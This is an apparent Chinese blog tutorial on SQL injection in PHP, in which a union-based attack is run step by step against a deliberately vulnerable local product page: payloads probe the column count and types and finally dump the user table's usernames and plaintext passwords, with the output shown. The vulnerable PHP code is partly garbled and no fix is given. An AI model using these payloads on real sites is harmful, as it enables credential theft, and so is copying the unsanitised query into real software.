PHP的SQL注入完整过程

发布时间:2021-08-30 17:00:14 作者:chen
来源:亿速云 阅读:228

这篇文章主要介绍“PHP的SQL注入完整过程”,在日常操作中,相信很多人在PHP的SQL注入完整过程问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”PHP的SQL注入完整过程”的疑惑有所帮助!接下来,请跟着小编一起来学习吧!

  SQL注入就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

  首先观察两个MYSQL数据表

  用户记录表:

  REATE TABLE `php_user` (

  `id` int(11) NOT NULL auto_increment,

  `username` varchar(20) NOT NULL default '',

  `password` varchar(20) NOT NULL default '',

  `userlevel` char(2) NOT NULL default '0',

  PRIMARY KEY (`id`)

  ) TYPE=MyISAM AUTO_INCREMENT=3 ;

  INSERT INTO `php_user` VALUES (1, 'seven', 'seven_pwd', '10');

  INSERT INTO `php_user` VALUES (2, 'swons', 'swons_pwd', '');

  产品记录列表:

  CREATE TABLE `php_product` (

  `id` int(11) NOT NULL auto_increment,

  `name` varchar(100) NOT NULL default '',

  `price` float NOT NULL default '0',

  `img` varchar(200) NOT NULL default '',

  PRIMARY KEY (`id`)

  ) TYPE=MyISAM AUTO_INCREMENT=3 ;

  INSERT INTO `php_product` VALUES (1, 'name_1', 12.2, 'images/name_1.jpg');

  INSERT INTO `php_product` VALUES (2, 'name_2', 35.25, 'images/name_2.jpg');

  以下文件是show_product.php用于显示产品列表。SQL注入也是利用此文件的SQL语句漏洞

  $conn = mysql_connect("localhost", "root", "root");

  if(!$conn){

  echo "数据库联接错误";

  exit;

  }

  if (!mysql_select_db("phpsql")) {

  echo "选择数据库出错" . mysql_error();

  exit;

  }

  $tempID=$_GET['id'];

  if($tempID<=0 tempid="1;" sql="SELECT * FROM php_product WHERE id =$tempID" echo="" result="mysql_query($sql);" if="" .="" while="" row="mysql_fetch_assoc($result))">

  观察此语句:$sql = "SELECT * FROM php_product WHERE id =$tempID";

  $tempID是从$_GET得到。我们可以构造这个变量的值,从而达到SQL注入的目的

  分别构造以下链接:

  1、 http://localhost/phpsql/index.php?id=1

  得到以下输出

  SELECT * FROM php_product WHERE id =1 //当前执行的SQL语句

  //得到ID为1的产品资料列表

  ID:1

  name:name_1

  price:12.2

  image:images/name_1.jpg

  2、 http://localhost/phpsql/index.php?id=1 or 1=1

  得到输出

  SELECT * FROM php_product WHERE id =1 or 1=1 //当前执行的SQL语句

  //一共两条产品资料列表

  ID:1

  name:name_1

  price:12.2

  image:images/name_1.jpg

  ID:2

  name:name_2

  price:35.25

  image:images/name_2.jpg

  1和2都得到资料列表输出,证明SQL语句执行成功

  判断数据表字段数量

  http://localhost/phpsql/index.php?id=1 union select 1,1,1,1

  得到输出

  SELECT * FROM php_product WHERE id =1 union select 1,1,1,1 //当前执行的SQL语句

  //一共两条记录,注意第二条的记录为全1,这是union select联合查询的结果。

  ID:1

  name:name_1

  price:12.2

  image:images/name_1.jpg

  ID:1

  name:1

  price:1

  image:1

  判断数据表字段类型

  http://localhost/phpsql/index.php?id=1 union select char(65),char(65),char(65),char(65)

  得到输出

  SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)

  ID:1

  name:name_1

  price:12.2

  image:images/name_1.jpg

  ID:0

  name:A

  price:0

  image:A

  注意第二条记录,如果后面的值等于A,说明这个字段与union查询后面构造的字段类型相符。此时union后面

  为char(65),表示字符串类型。经过观察。可以发现name字段和image字段的类型都是字符串类型

  大功告成,得到我们想要的东西:

  http://localhost/phpsql/index.php?id=10000 union select 1,username,1,password from php_user

  得到输出:

  SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user

  //输出了两条用户资料,name为用户名称,image为用户密码。

  ID:1

  name:seven

  price:1

  image:seven_pwd

  ID:1

  name:swons

  price:1

  image:swons_pwd

  注意URL中的ID=10000是为了不得到产品资料,只得到后面union的查询结果。更具实际情况ID的值有所不同

  union的username和password必须放在2和4的位置上。这样才能和前面的select语句匹配。这是union查询

  语句的特点

  备注:

  这个简单的注入方法是更具特定环境的。实际中比这复杂。但是原理是相同的。

到此,关于“PHP的SQL注入完整过程”的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注亿速云网站,小编会继续努力为大家带来更多实用的文章!

推荐阅读:
  1. Centos 7 安装RocksDB完整过程
  2. 一个PHP的SQL注入完整过程

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

php

上一篇:Linux基础命令tune2fs的用法

下一篇:java查看class文件的方法

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》